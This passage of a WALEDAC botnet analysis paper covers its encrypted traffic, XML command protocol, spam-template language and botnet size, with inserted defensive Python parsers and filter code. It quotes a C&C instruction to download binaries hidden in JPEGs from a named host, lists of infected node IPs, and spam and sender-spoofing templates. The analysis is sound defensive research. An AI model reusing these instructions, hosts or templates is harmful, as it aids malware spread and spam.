q69d-opDMIUGdOAkQLVWZJImCD-W1o8pV9R30SwOy9nc7U48EkimKhCFPsUzIG67AHBbsHjHa_-kX_8bqOQ7wq2lwEA9I6aRhzs9-mMfgWqb1wHAYU1TEy2iByKUJyxuJ0fg6nV64moWvsM0Jcfy3yrmWkjUUYUy2vfnCF61O4EG27NJ1LYOS5Sp9xeNV8NbL_rnLVkTwiHFcHXcTf6wKfnmGfaVd1ALk7Nnoq1wGIIIgYSNnJsLEPM3sfhKl1mbAj1lAPq-_xGMC6R_t6Sug5WjTVIpa_Eq1aONUADnDCMsm4JYiHYap-odbwMgLs7IZl_5cfQdSRjD0cJjYxNI00H45QEUqOQFeQr3ctx--TC2ob0cmN1nIguJl0KdvATj_bqY8-pnywRZB-hi-7tcrZXyxVGU8DYJ6ewM5m3yxg4sWKmZSCWY1j5HAuxsMafXrsgU7BvN0jQkQUm4K7m9iYmmVYe8uaHBDQ_Pbq5pZUwPguO_CdqTTSWjDgfucmdJ3jhb03xrLuqCqmkE2DEA38NKq_YjEZc0N8MLPOPTKFCA2PMIQX8VH8PtPfMGum2Jl5eAM2GXfovWvX5WvALx1IIeNhlFBhe3UcEKPvcjp3uSWUq-zLeXW9sHp-Rs-CVSmtomEE5ppB78pbIM

HTTP/1.1 200 OK
Server: Apache 1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 3883

iZg3LlWBrSO8IaRbFB1Gs9EXlzgPaeXLTd8JioLmt27kwXShCdzSpYV7B9DWkqUCtcNHvIn9fmgOIHdp7p9MS8tWoroszO-Mvu6ogASdnpwf1AJE835q06R_KMUMSYPl7kZBeV2CzDv9v9DjYdqNeoCEvlUlrues3w5BiERDXtupIXtTy-Xe4KsSOxywTdv7XRAa8aR9OZUYQNf1OHsAgwRPNehBZSFclqj6aPtFl0mknEIaaZUQqO79UVRCvZU8auQE9jHMNYDYDp_1pBchnzgaxmJPj4cg865j2K1xfzTugVoO6veaEJZ_KiqsETMyNEEjXhr3tnVIxHjjE_Z63S6Rh28zzav_Gplya5Gcpb1kwU179rdphqu8TvUxJB_t0t1QzIvLtG0ahEbHTwb6Cv2XZup0SfUaxeyla8szLMESoHYu94kyj1l6v266NsVlKNFmiruIARL0sxZiFqmoWGDa_WdVUF8bfI39c388Fc52WDJa6h-JWzhgaxKir9iCq2HGddHS4KAbr2sMYdRkLu8yASldb_9mstjXQiMCYOniG0slq4qv7euWsGaBNMKFGTI1DPO9CWKWgnXU3lN1hR-XyJZEPiOPP6l4W4oahePoSvb3IVumNvSgLt5WNbDaY2uQx4NxDxezibQZnAHRbWglzXtv7xQRFacocFuLzIW0tJkFdNLcT2PeD5u85xtbqbcDlVRb7dFPZWrFREynAy1qGD4qXZn1C-wcZhcegcuxv20Vu3hFiyMuh3MSqABS_HPMEkiIdnNNu9NHoKngcy1c3hGEfuCdSk9_XcsHaaoDJ02uBJ8Iw7BpeKeBULbYpVr82M4DDEh_NK_l0vzYNNZ4hXMDIHR_PGsyoABO1cwwCtzRKen5-O4zr4668v7hiAnlHMNYJUrz8JuZPLQPFwZQ9FqW9nGWx68XPBRVFglBLnOBa33NEm2m-._-KnaX3hXqqWe-QoWGien7KGP9kfg4hYhRuZKlNCb6VxWl0es1lilsWtJSvIHrT5G54NZmv94FmOvr_Q1lyd0m8aeCmV_sx43bl_iCKcKo2q4MpqB2DHySb0uRG1eBX5kZjPxOGw6zXWN9auX9r7_RgRyf6izsGFnpoWgVukwcxwrQMgNHMhcx66WT-3X-KVkANkiTJB4KJU2mB7hk1RroV8fmFWQjgaq0FTFbnjLmgg87tZBd_0pid79m-YjWpwmXvadFDo2FFGAt-23Lu4IcMy8rS4

The message is quite long (truncated on purpose) but is fairly easy to decrypt. The steps described earlier still apply, the only difference being that after Base64 decoding all of the data is used, including its first 5 bytes. AES decryption with the first AES key found in the WALEDAC binary is then performed, after which the data is uncompressed using bzip2.


The following decoded and decrypted message is the bot or server message reply to the HTTP POST request by the WALEDAC binary from IP 24.21.164.180 as shown above. This message can be an updated list of other WALEDAC nodes:

<lm>
  <localtime>1237547711</localtime>
  <nodes>
    <node ip="98.162.239.96" port="80" time="1237547696">362789203a76176ddf29db3399273c5f</node>
    <node ip="76.123.47.40" port="80" time="1237547641">b542d0288e23574f644eb6064247446b</node>
    <node ip="24.249.5.39" port="80" time="1237547565">3246427e7c67bd0a9d0ac47aec14c818</node>
    <node ip="76.107.135.225" port="80" time="1237547559">1f52f117673ff37b7714a16b7422b72d</node>
    <node time="1237547233">3c36e67efc68eb5a363f0044d4403308</node>
    <node ip="61.120.139.212" port="80" time="1237547233">8a065c4b616893172a5d0d21df2ca502</node>
    <node ip="67.166.187.226" port="80" time="1237547232">030a4174a45756002122cc6b94391268</node>
    <node ip="196.203.69.118" port="80" time="1237547229">590489560c50fa7fc014f03a46644378</node>
  </nodes>
</lm>

Another form of encrypted message that does not have a 5-byte header is sent by a server or a node when WALEDAC issues an HTTP GET request to /index.php on one of its domains as shown below.

GET /index.php HTTP/1.1
User-Agent: Mozilla
Host: greetingguide.com

HTTP/1.1 200 OK
Content-Type: text/html
Transfer-Encoding: chunked
Server: nginx/0.6.33
Date: Tue, 03 Feb 2009 21:09:10 GMT
Connection: keep-alive
X-Powered-By: PHP/5.2.8

496


4mffm9_Oxo0BRI95ztlYRRNrQHgH7XZAOIYFxeavybQ1SGsfl_7aycAR8eQKeTZq2VlKjcJsTdRUWDgQ0p332JOvdmDSpDCb8-jDXsRO-1mDjMYVKGG6cXoSwhf0QSFl6zp6Bv71969VojF4nCtqTEMN8jeouwV9uJXbxU p07x7WrE7j7OmgjDJM2NgrxQmVvbGWpzeN2BdrK-gyIXGFyGGU8BglPGIfitnnNUJSUeJCZJGzrWtIsho5G jC6Fcenz-7Mt0oItFbp38XvGSnhedyWHt0SZNaxdEhA-M5oWz83ffRm0o6WtVO8OB4vMmuCbK4LwNG_9UFx K8knbLDwLd5g7IZJyi6bA1LqFzwQYXpdVVT2YyeAqNFUoB940ZqV1hJ69zhBcpSwCKhZ8xALPnPmkR6qafqU-quigY74Y6LChlN4_LMMhbY8Xe62hXnaa3uLMkrL2ajiDE7Vj5FcPRpB9Db18NV75p9aew8hhPsivzeABb JZMQOa_2s1eRz_afEeFPmcOKlZ3zEK_aqvtKAbsYcusmnUiYQRyARxXQlq9wj85Wi_N7C1AY4n3b68X7pHbq3MhfHGDUIa8TcExIJvERUABcsj6UE3btrIygimnmO4ylxgqueDzDDRo3fYfMyOCR2pFoSpn-K3nRtIIzcw 30a5friKdyhsBme2g-VKNZQsueE1YC3-y1INUQ7oT4pvvQInV6e9s20YlSPSqMZuFyhG5dYORScTpOxoI24 P6JG--sz-MvPAlqECJVB1MUMqiUdOaFG-LeVOIH5ruuHtVaxovoHz4G2cuSmthOLTyYlmFrkHAE1Fh-xVs NBoYhIHVHcK2DXYITFh-rzxkFJiW7E6N5wc8Ijnzjju1GMO_8f-mwnNkJSLcWpCeIQ-r3V1yfWz8klYv9D sggLDH6K01GPUFZcjt59pwPDecfQz5GZ1D_Y1h2KIp_VP0pTdYnrZz4GZM33Z6_mwBlfQNLNOurkAnZkCYYuFSchympl_WmBMO2UHn7aDGba7-JtYhQ_kbshLz1vsI5lJDiMVbSQkYlT0RPUVYbwPXhDWnab84u-PE9XiQ 9XKjYniWeND2aMRMQUvg9G3hTMhl55vCnLZDWWIhGzqj4qinnYDC8ag1-d58GlrvlxBGLqey9w8El9sFQTI 7S17sHGzPiniNQ

The encrypted server reply can also be decoded and decrypted by following the steps discussed earlier. Note, however, that after Base64 decoding, the second AES key must be used. The result is the original XML message shown below; this reply is not bzip2-compressed, so no decompression step is needed.

<lm>
  <localtime>0</localtime>
  <nodes>
    <node ip="211.135.94.231" port="80" time="0">e93c1e64944d64700c35bd3fdd355970</node>
    <node ip="84.16.228.132" port="80" time="0">33a4c14ed5b99a93d9051e861950c95b</node>
    <node ip="217.79.77.251" port="80" time="0">f624d7715e1177628d59d70845024a71</node>
    <node ip="82.74.40.225" port="80" time="0">a423ad3cd308506efc70c25c7e56d228</node>
    <node ip="96.52.249.123" port="80" time="0">70088958d402a352d05b66687e541b7c</node>
    <node ip="89.205.54.201" port="80" time="0">124b4a0a2b011c5bfc3cf0054566e43e</node>
    <node ip="217.218.12.215" port="80" time="0">116a5d79bd24001f7f62df4a1b5c8260</node>
    <node ip="69.180.11.134" port="80" time="0">a862f13e790ee658015c3943e534163f</node>
    <node ip="82.51.36.86" port="80" time="0">f15d3d17334caf1c556784743e612e0b</node>
    <node ip="82.23.40.215" port="80" time="0">f76ed31e6b184f160d0a451e382cbb17</node>
  </nodes>
</lm>

DECRYPTING THE ENCRYPTED REGISTRY BLOB

Other encrypted data is found in the registry of the affected host, specifically in RList under HKCU\Software\Microsoft\Windows\CurrentVersion, as shown below.

Figure 10. Data stored in registry

The binary data is encrypted using either of the two AES keys found in the WALEDAC binary. Decrypting the data using AES yields bzip2-compressed data, a section of which is shown below.

Figure 11. bzip2-compressed data from the registry


Decompressing the bzip2 data above reveals XML containing a list of WALEDAC nodes, which the bot uses to record its most recently known peer nodes, as shown below.

Figure 12. Deciphered data from registry

WALEDAC HTTP2P Communication Protocol

WALEDAC uses several commands to control nodes. A node can be designated as a spamming node or a command proxy node. This paper focuses on a WALEDAC-infected machine designated as a spamming node.

As mentioned earlier, WALEDAC commands use an XML message structure to pass information around. The following is the standard structure of a decrypted HTTP POST, the method a WALEDAC node uses to communicate with a WALEDAC proxy, which then relays the communication to the WALEDAC command-and-control (C&C) server, using the following values4:

<lm>
  <t>(command type)</t>
  <v>(WALEDAC bot version)</v>
  <i>(node id)</i>
  <r>(0 or 1 value)</r>
  <props>
    <p n="(attribute)">(text)</p>
  </props>
</lm>

The reply from the proxy node differs slightly in structure from the POST sent by a WALEDAC spamming node. The following is the standard structure of a decrypted reply from a WALEDAC C&C:

<lm>
  <v>(WALEDAC proxy version)</v>
  <t>(command type)</t>
  <props>
    <p n="(attribute)">(text)</p>
    <element>(text)</element>
  </props>
</lm>

4 According to NNL-labs (http://www.nnl-labs.com/cblog/index.php?/archives/8-Talking-with-WALEDAC/WALEDAC.html).

Omitted in the reply is the node id while the order of the command type and the WALEDAC bot version is transposed.

There are nine known WALEDAC commands identified by type, namely, ff, 01, 02, 03, 04, 05, 06, 07, and None, each of which is used for a specific purpose. Appendix C shows sample POSTs and replies for each command type.
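As an added example (not code from the paper or from the WALEDAC binary), the following Python parses both message shapes documented above, the peer-list exchange (<lm><nodes>...) and the command POST/reply (<lm><t>...<props>...), into one record, and drops peer entries that lack an address, such as the one in the captured sample, so that the remainder can be used directly as a block list. The element and attribute names come from the structures on this page; the sample messages, node ids, and IP addresses are constructed from documentation ranges, not captured traffic.

```python
"""Parser for decrypted WALEDAC <lm> messages.

Added example; not code from the paper or from the malware. It covers the two
message shapes the paper documents: the peer-list exchange (<lm><nodes>...)
and the command POST/reply (<lm><t>...<props>...). The sample inputs below are
constructed in that shape with documentation IP ranges, not captured traffic.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional
import xml.etree.ElementTree as ET


@dataclass
class Peer:
    node_id: str            # 32-hex node id carried as the element text
    ip: Optional[str]       # missing in some entries, as in the paper's sample
    port: Optional[int]
    time: int               # Unix timestamp the peer was last seen


@dataclass
class Message:
    command: Optional[str]          # <t>, e.g. "notify"; absent in peer lists
    version: Optional[str]          # <v>, bot or proxy version
    node_id: Optional[str]          # <i>, omitted in replies
    props: Dict[str, str] = field(default_factory=dict)   # <p n="...">text</p>
    peers: List[Peer] = field(default_factory=list)       # <node ...> entries
    localtime: Optional[int] = None


def _text(element: ET.Element, tag: str) -> Optional[str]:
    child = element.find(tag)
    return None if child is None else (child.text or "").strip()


def parse_lm(xml_text: str) -> Message:
    """Parse one decrypted message; raises ValueError if the root is not <lm>."""
    root = ET.fromstring(xml_text)
    if root.tag != "lm":
        raise ValueError("not a WALEDAC <lm> message: <%s>" % root.tag)
    msg = Message(command=_text(root, "t"), version=_text(root, "v"),
                  node_id=_text(root, "i"))
    localtime = _text(root, "localtime")
    msg.localtime = int(localtime) if localtime else None
    props = root.find("props")
    if props is not None:
        for p in props.findall("p"):
            msg.props[p.get("n", "")] = (p.text or "").strip()
    nodes = root.find("nodes")
    if nodes is not None:
        for node in nodes.findall("node"):
            port = node.get("port")
            msg.peers.append(Peer(node_id=(node.text or "").strip(),
                                  ip=node.get("ip"),
                                  port=int(port) if port else None,
                                  time=int(node.get("time", "0"))))
    return msg


def routable_peers(msg: Message) -> List[Peer]:
    """Peers that carry both ip and port, newest 'time' first.

    Entries without an address (the paper's sample has one) are dropped, so
    the result is directly usable as an indicator list for network blocking.
    """
    usable = [p for p in msg.peers if p.ip and p.port]
    return sorted(usable, key=lambda p: p.time, reverse=True)


# Constructed samples (documentation addresses), shaped like the paper's captures.
SAMPLE_PEER_LIST = (
    '<lm><localtime>1237547711</localtime><nodes>'
    '<node ip="198.51.100.10" port="80" time="1237547696">0123456789abcdef0123456789abcdef</node>'
    '<node time="1237547233">fedcba9876543210fedcba9876543210</node>'
    '<node ip="203.0.113.7" port="80" time="1237547641">00112233445566778899aabbccddeeff</node>'
    '</nodes></lm>'
)
SAMPLE_COMMAND_POST = (
    '<lm><t>notify</t><v>34</v><i>0123456789abcdef0123456789abcdef</i><r>1</r>'
    '<props><p n="winver">5.1.2600</p><p n="time_now">1237547711</p></props></lm>'
)

if __name__ == "__main__":
    for peer in routable_peers(parse_lm(SAMPLE_PEER_LIST)):
        print(peer.ip, peer.port, peer.node_id)
    print(parse_lm(SAMPLE_COMMAND_POST).props)
```

The same parser accepts the registry RList XML, which has the peer-list shape, so a host-side triage script can feed the decrypted blob through parse_lm and compare the stored peers with those seen on the wire.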

Command Type: FF (GETKEY)

This command serves as an authentication routine for a WALEDAC node. It is commonly the first command a WALEDAC node issues when communicating with the WALEDAC C&C, before requesting or issuing any other command.

In our sample, a WALEDAC node sends a certificate and receives a reply with an AES key. This certificate is the same one found in the WALEDAC binary, which changes from file to file, meaning each WALEDAC node has a unique certificate.

Command Type: 01 (FIRST)

This command contains information on what Windows OS version the WALEDAC node runs on as pointed out by the winver attribute (in our sample, the value is 5.1.2600, which refers to Windows XP).

The C&C gives an empty reply, implying that this particular command is stateless and merely serves to inform the WALEDAC group about the Windows OS version the affected system runs on.

Command Type: 02 (NOTIFY)

For this command, the WALEDAC node just POSTs the date and time when it started running (i.e., time_init), the current date and time (i.e., time_now and time_sys), and how long the affected system has been running (i.e., time_ticks). The text string mirabella_site is hardcoded in the WALEDAC binary as well.

Among all the commands, the replies to Command type 02 from the WALEDAC proxy are the most baffling, mainly because some of their content appears to have no relation to WALEDAC activity.


The reply contains the text content wergvan, which appears to be a spoofed domain used when communicating with a mail server for spamming purposes.

Figure 13. Text content wergvan

The element <p n="ip">203.177.193.xxx</p> in the reply is the external IP address of the infected node, while the meaning of the dns_ip and smpt_ip attributes remains unknown since the IP addresses they supply are not consistently seen in network traffic.

http_cache_timeout seems to be a configuration that indicates how long a transaction with a WALEDAC proxy remains valid (in this case, 60 minutes) while the sender_threads and sender_queue seem to be configurations of how many threads and email messages can be generated at any given time, respectively.

The short_logs attribute always has a TRUE text value.

The commands attribute is the most interesting in Command type 02. The text content [CDATA[337|update|http://usabreakingnews.com/mir.jpg340|download|http://usabreakingnews.com/win.jpg] appears to be an instruction to download the files mir.jpg and win.jpg.

Most of the time, these files are plain Joint Photographic Experts Group (.JPEG) image files. However, a few instances were also seen in which WALEDAC updated the spamming node through an encrypted WALEDAC binary embedded inside the .JPEG files.

Figure 14. Encrypted WALEDAC binary embedded inside mir.jpg

Figure 15. Manual decryption reveals the MZ/PE header


In the three months of WALEDAC monitoring, the spamming node downloaded 11 malware files using this method, five of which were updated WALEDAC binaries while the remaining six were rogue antivirus malware.

This technique gives WALEDAC a complicated self-updating method and helps explain the highly homogeneous node variants comprising the WALEDAC botnet.

The images shown below are downloaded from the links found in Command type 02 and were used to carry the WALEDAC binaries. These pictures may have been chosen to humor either the players behind WALEDAC or the security researchers snooping on the botnet’s activities.

Figure 16. Sample images downloaded from links found in Command type 02

Command Type: 03 (TASKREQ)

For Command type 03, the WALEDAC spamming node just sends a short POST message to the WALEDAC proxy node. It appears to be a request by the WALEDAC spamming node for tasks coming from the WALEDAC proxy. A lengthy reply in the following format is then received:

<lm>
  <v>(proxy node version)</v>
  <t>taskreq</t>
  <props></props>
  <tasks>
    <task id="(id)">
      <body>(b64 encoded string)</body>
      <a>(target e-mail address)</a>
      <a>(target e-mail address)</a>
      …
      <w>(name of list - to be used in spam e-mails)</w>
      …
    </task>
  </tasks>
  <words>
    <w name="(name of list)" time="(time)"/>
    …
  </words>
</lm>

1. Proxy node version: Our sample reply reveals a WALEDAC version 27 proxy, which is a lower version compared with that of the WALEDAC version 34 spamming node. All Command type 03 replies are in version 27, suggesting that the proxy nodes used in the command are probably not being updated.

2. Tasks: Furthermore, the <tasks> element has two child elements, namely, <task id=“4”> and <task id=“3”>. These contain additional child elements that can be used for a particular spam run.

Since the tasks are defined by the group behind WALEDAC, Command type 03 gives WALEDAC controllers the ability to control spam runs—when to begin, what to spam, who to send spam to, what the email body and subject should contain, and what domains and URLs to include.

3. Body: The <body>(b64 encoded string)</body> element contains the email body format of the spam run. Decoding the Base64-encoded string reveals the following:

» For task id=“4”

%^J%^Fpharma^% http://%^P%^R2-6^%:qwertyuiopasdfghjklzxcvbnmeuioa^%.%^Fpharma_links^%/^%


» For task id=“3”

%^J%^Fcupo_string^% http://%^P%^R2-6^%:qwertyuiopasdfghjklzxcvbnmeyuioa^%.%^Fcupo_link^%/%^Fcupo_file^%.php^%

Translated into a more readable form, the email body for pharma spam takes the following shape:

<phrase advertising pharma> http://<random 2 to 6 letters>.<pharma domain>

Cupo spam (taken from the word coupon) is a WALEDAC spam run advertising fake coupons, which follows the email body format below.

<phrase advertising coupon> http://<random 2-6 letters>.<coupon domain>/<file>.php

4. Target email addresses: After defining the email body format, the next elements contain the target email addresses enclosed in <a></a> tags. Each task contains exactly 500 target email addresses.

5. Name of list: The next elements, <w>, name the word lists that are used to construct the email body and the email details.

These names are passed as parameters when requesting a new list, a dictionary, or a string array using Command type 04.

Command Type: 04 (WORDS)

Command type 04 updates WALEDAC’s words or word lists that are used in a particular spam run.

To explain how Command type 04 works, we used the Command type 03 sample reply, specifically for task id=“4”.

The Base64-decoded email body format looks like the one below.

%^J%^Fcupo_string^% http://%^P%^R2-6^%:qwertyuiopasdfghjklzxcvbnmeyuioa^%.%^Fcupo_link^%/%^Fcupo_file^%.php^%


The words used include the following:

<w>charset</w> <w>cupo_file</w> <w>cupo_link</w> <w>cupo_string</w> <w>domains</w> <w>mynames</w> <w>names</w> <w>outver</w> <w>outver.5</w> <w>outver.6</w> <w>pharma</w> <w>pharma_links</w> <w>sendmailver</w> <w>surnames</w> <w>svcver</w> <w>trunver</w>

In the example above, the spamming node needs to fetch the word lists cupo_string, cupo_link, and cupo_file since the task's child elements only name these lists and do not include their contents.

Command type 04 gives WALEDAC spamming nodes the ability to request and update word lists. It also gives WALEDAC's handlers the ability to update the words, phrases, and values used to create virtually unique, dynamic emails.

The following is a sample spam advertising free coupons whose links lead to WALEDAC binaries. WALEDAC randomly chooses which entry from each word list to use. In the sample coupon spam, each word is labeled with the word list from which it was taken:

Figure 17. Sample WALEDAC-related spam
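The two body formats decoded under Command type 03 and the word-list handling of Command type 04 above can be worked through with the following added Python, which is not the paper's code. The marker meanings it uses are inferred from the paper's own translation of the two samples (%^F...^% selects an entry from a named word list, %^P%^R2-6^%:alphabet^% produces 2 to 6 random characters from the alphabet, %^J...^% wraps the body) and are assumptions. From a template it lists the word lists a node must fetch with Command type 04, and it turns the template into a mail-filter regular expression in which the random subdomain is bounded to its alphabet and length, which is the part of such a message a gateway can match on. The sample message body is constructed, not a captured spam.

```python
"""Parser for WALEDAC spam body templates (the Base64-decoded <body> text).

Added example, not the paper's code. Marker meanings are inferred from the
paper's own translation and are assumptions: %^F<name>^% is one entry from
word list <name>; %^P%^R<lo>-<hi>^%:<alphabet>^% is <lo>..<hi> random
characters from <alphabet>; %^J ... ^% wraps the whole body.
"""
import re
from typing import Dict, List, Optional

# The two templates the paper decodes (task id=4 and task id=3 bodies).
PHARMA_TEMPLATE = ("%^J%^Fpharma^% http://%^P%^R2-6^%:qwertyuiopasdfghjklzxcvbnmeuioa^%"
                   ".%^Fpharma_links^%/^%")
CUPO_TEMPLATE = ("%^J%^Fcupo_string^% http://%^P%^R2-6^%:qwertyuiopasdfghjklzxcvbnmeyuioa^%"
                 ".%^Fcupo_link^%/%^Fcupo_file^%.php^%")


def parse_template(text: str) -> list:
    """Parse into a tree of ("lit", text) and (marker_letter, [children]) nodes."""
    return _parse(text, 0, nested=False)[0]


def _parse(s: str, i: int, nested: bool):
    # '%^X' opens marker X; '^%' closes the innermost open marker.
    nodes, buf = [], ""
    while i < len(s):
        if nested and s.startswith("^%", i):
            if buf:
                nodes.append(("lit", buf))
            return nodes, i + 2
        if s.startswith("%^", i) and i + 2 < len(s):
            if buf:
                nodes.append(("lit", buf))
                buf = ""
            kind = s[i + 2]
            children, i = _parse(s, i + 3, nested=True)
            nodes.append((kind, children))
            continue
        buf += s[i]
        i += 1
    if nested:
        raise ValueError("unterminated %^ marker")
    if buf:
        nodes.append(("lit", buf))
    return nodes, i


def _literal(children) -> str:
    return "".join(v for k, v in children if k == "lit")


def _pick_spec(children):
    """For a P marker: (lo, hi, alphabet) from its nested R range and ':alphabet' text."""
    lo, hi, alphabet = 1, 1, ""
    for kind, val in children:
        if kind == "R":
            lo, hi = (int(x) for x in _literal(val).split("-", 1))
        elif kind == "lit" and val.startswith(":"):
            alphabet = val[1:]
    return lo, hi, alphabet


def word_lists(nodes) -> List[str]:
    """Word lists the template references, in order of first use; the node
    must fetch each of these with Command type 04 before it can spam."""
    names: List[str] = []
    for kind, val in nodes:
        found = [_literal(val)] if kind == "F" else word_lists(val) if kind == "J" else []
        names.extend(n for n in found if n not in names)
    return names


def to_regex(nodes) -> str:
    """Mail-filter regex: literals escaped, random parts bounded to the alphabet
    and length range, word-list slots captured as named groups."""
    parts = []
    for kind, val in nodes:
        if kind == "lit":
            parts.append(re.escape(val))
        elif kind == "F":
            parts.append("(?P<%s>.+?)" % _literal(val))
        elif kind == "P":
            lo, hi, alphabet = _pick_spec(val)
            parts.append("[%s]{%d,%d}" % (re.escape(alphabet), lo, hi))
        elif kind == "J":
            parts.append(to_regex(val))
        else:                       # unknown marker letter: match loosely
            parts.append(".+?")
    return "".join(parts)


def match_body(template: str, body: str) -> Optional[Dict[str, str]]:
    """Captured word-list slots if the body fits the template, else None."""
    m = re.fullmatch(to_regex(parse_template(template)), body)
    return m.groupdict() if m else None


# Constructed message body in the pharma shape (not a captured spam).
CONSTRUCTED_PHARMA_BODY = "Cheap meds today http://qwe.example-pharma.test/"
```

The word-list slots are deliberately captured rather than matched against fixed values, because the lists change through Command type 04; the stable, matchable parts of the template are the literals and the random-subdomain alphabet and length.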


WALEDAC spoofs the email From field by supplying a fake name from mynames and by constructing a fake email address that concatenates an entry from the names and domains word lists (i.e., <name from names>@<domain from domains>).

In the image below, the values chosen from mynames, names, and domains word lists that serve as spoofed From values are labeled accordingly.

Figure 18. Labeled values from mynames, names, and domains word lists

In the preceding image, WALEDAC emulates a Microsoft Outlook mail user agent. WALEDAC supplies the character set and the X-Mailer and MimeOLE header values from the charset and outver word lists.

WALEDAC also changes other parts of the Simple Mail Transfer Protocol (SMTP) header, probably in an attempt to confuse spam filters or mail server restrictions.


Figure 19. Sample message

Figure 20. Sample message

Command Type: 05 (TASKREQ)

This command reports to WALEDAC proxies the email addresses to which the node has successfully sent spam.


The element attribute b64 whose value is TRUE means that the succeeding attributes under reports are Base64 encoded. Base64 decoding the attributes reveals the following:

<rep id="4" rcpt="[email protected]">ERR</rep>
<rep id="4" rcpt="[email protected]">ERR</rep>
<rep id="4" rcpt="[email protected]">ERR</rep>
<rep id="4" rcpt="[email protected]">OK</rep>
<rep id="4" rcpt="[email protected]">OK</rep>
…
<rep id="4" rcpt="[email protected]">ERR</rep>
<rep id="4" rcpt="[email protected]">ERR</rep>

The email addresses are the target recipients provided by the WALEDAC C&C in Command type 03 (domains blurred due to privacy concerns). The text content OK or ERR signifies whether or not the spamming node successfully sent spam to the particular address.
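The following Python, an added example and not the paper's code, Base64-decodes a report blob of the shape shown above and aggregates the OK/ERR results per recipient domain and per task id, which is what a mail administrator reviewing such a capture would want to know: which of their domains accepted the botnet's mail and which rejected it. The sample report and its addresses are constructed with reserved example domains.

```python
"""Summarize a WALEDAC Command type 05 delivery report.

Added example, not the paper's code. The paper shows the decoded report as a
run of <rep id=".." rcpt="..">OK|ERR</rep> elements with no enclosing root;
the sample below is constructed with reserved example domains.
"""
import base64
from collections import Counter, defaultdict
from typing import Dict, List, Tuple
import xml.etree.ElementTree as ET

Report = Tuple[str, str, str]   # (task id, recipient, "OK" or "ERR")


def decode_reports(b64_blob: str) -> List[Report]:
    """Base64-decode the report blob and parse its <rep> elements."""
    raw = base64.b64decode(b64_blob).decode("utf-8")
    root = ET.fromstring("<reports>" + raw + "</reports>")  # wrap: no root element
    return [(rep.get("id", ""), rep.get("rcpt", ""), (rep.text or "").strip())
            for rep in root.findall("rep")]


def delivery_by_domain(reports: List[Report]) -> Dict[str, Dict[str, int]]:
    """Count OK/ERR per recipient domain (case-folded)."""
    per_domain: Dict[str, Counter] = defaultdict(Counter)
    for _task, rcpt, status in reports:
        domain = rcpt.rsplit("@", 1)[-1].lower()
        per_domain[domain][status] += 1
    return {domain: dict(counts) for domain, counts in per_domain.items()}


def success_rate_by_task(reports: List[Report]) -> Dict[str, float]:
    """Fraction of OK results per task id, i.e. per spam run."""
    totals: Dict[str, Counter] = defaultdict(Counter)
    for task, _rcpt, status in reports:
        totals[task][status] += 1
    return {task: c["OK"] / sum(c.values()) for task, c in totals.items()}


# Constructed sample (reserved example domains), Base64-encoded the way the
# bot encodes the reports attribute before placing it in the POST.
_CONSTRUCTED_REPORTS = (
    '<rep id="4" rcpt="alice@example.com">ERR</rep>'
    '<rep id="4" rcpt="bob@example.com">OK</rep>'
    '<rep id="4" rcpt="carol@example.net">OK</rep>'
    '<rep id="3" rcpt="dave@example.net">ERR</rep>'
    '<rep id="3" rcpt="erin@Example.net">OK</rep>'
)
SAMPLE_REPORTS_B64 = base64.b64encode(_CONSTRUCTED_REPORTS.encode("utf-8")).decode("ascii")

if __name__ == "__main__":
    reps = decode_reports(SAMPLE_REPORTS_B64)
    print(delivery_by_domain(reps))
    print(success_rate_by_task(reps))
```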

Command Type: 07

This command type reports to the WALEDAC C&C a list of email addresses found in the affected system. This is done by searching for plain-text email addresses in files. This command not only gives the group behind WALEDAC the ability to gather new email addresses to spam but also to filter certain email addresses or certain domains that they want to blacklist to prevent them from receiving the WALEDAC spam.

The C&C reply to this particular message seems to be just an acknowledgment that the message was indeed received.

Command Type: NONE

This is not actually a command type since it does not have a command type number or a command name in the communication. This is basically WALEDAC’s method of sharing and updating available nodes to contact. In the sample POST in Appendix C under None, we can see the IP address, port, time, and node ID in the node attributes. Note that both the POST and the reply follow the same message format.

WALEDAC Command Distribution

Of course, not all commands are equal in terms of distribution. The figure below shows more than two months’ worth of WALEDAC commands broken down by type (i.e., per reply or POST transaction, not per byte of data).


Figure 21. Percentage distribution of WALEDAC commands

Among the command types, Command type none, which shares peer node IP addresses, occupied the biggest chunk. This means that a lot of the WALEDAC traffic is dedicated to ensuring that the nodes the bot connects to are updated.

The second largest chunk, unsurprisingly, belonged to the getkey or the so-called handshake command, which serves as an authentication routine for WALEDAC nodes.

Updating word lists to generate spam took the third biggest chunk, confirming the fact that WALEDAC spamming nodes are designed to be active spammers. It also makes sense that the taskreq command only came after the words command since WALEDAC nodes report successful and unsuccessful spamming attempts.

Both the notify and taskreq commands are intriguing, especially if we consider that spam targets are defined by taskreq replies. So it is quite surprising on our part to see notify transactions having a bigger chunk than taskreq replies. However, a taskreq reply contains at least two spam formats and at least a thousand target email addresses, lessening the need for frequent updates, resulting in a lower number of taskreq transactions compared with other command types. On the other hand, notify transactions are made at least every hour, implying spammers’ firm effort to keep WALEDAC nodes updated.

Unsurprisingly, the smallest number of transactions belonged to the emails command, which reports discovered email addresses to the WALEDAC C&C.


Figure 22. A plot of spam-related WALEDAC commands


WALEDAC BOTNET PROFILE

Size of the Botnet

WALEDAC commands are sent through proxy or repeater nodes, which then relay them to the WALEDAC C&C. On a daily basis, a spamming node sees around 660 unique WALEDAC proxy IP addresses broadcast through the none command. These are then used by WALEDAC spamming nodes to proxy command transactions and to conduct other WALEDAC-related activities.

Estimating how many have been affected by the WALEDAC botnet is quite a task since it is dynamic in nature—nodes are constantly being added to (i.e., representing new infections) or being removed from (i.e., upon discovery and upon removal of the infection) it. With this in mind, a rough calculation of the size of the population that has been affected by WALEDAC on any given day can instead be done.

To do this, two assumptions should be kept in mind:

1. The number of clients outnumbers that of servers (in the same way that the number of spamming nodes outnumber that of proxy nodes).

2. The current client-to-server ratio is 10:1.

Since an average of 660 WALEDAC proxies operate on any given day and, considering the aforementioned assumptions, it can be gleaned that at least 6,600 spamming nodes send out spam every day. Note that our visibility into the breadth of WALEDAC nodes was limited to the botnet segment we monitored.

On an average digital subscriber line (DSL) connection with 0.2Mbps download and 0.11Mbps upload speeds, a WALEDAC node generates around 140,000 spam messages per day. So, assuming that 6,600 WALEDAC spamming nodes operate per day, the WALEDAC botnet is capable of spewing at least 924 million spam messages per day.

WALEDAC Proxies and Fast-Flux Networks

Another interesting discovery we made while investigating WALEDAC is that some proxy nodes not only proxy WALEDAC commands but are also part of the fast-flux system used by WALEDAC-related domains.


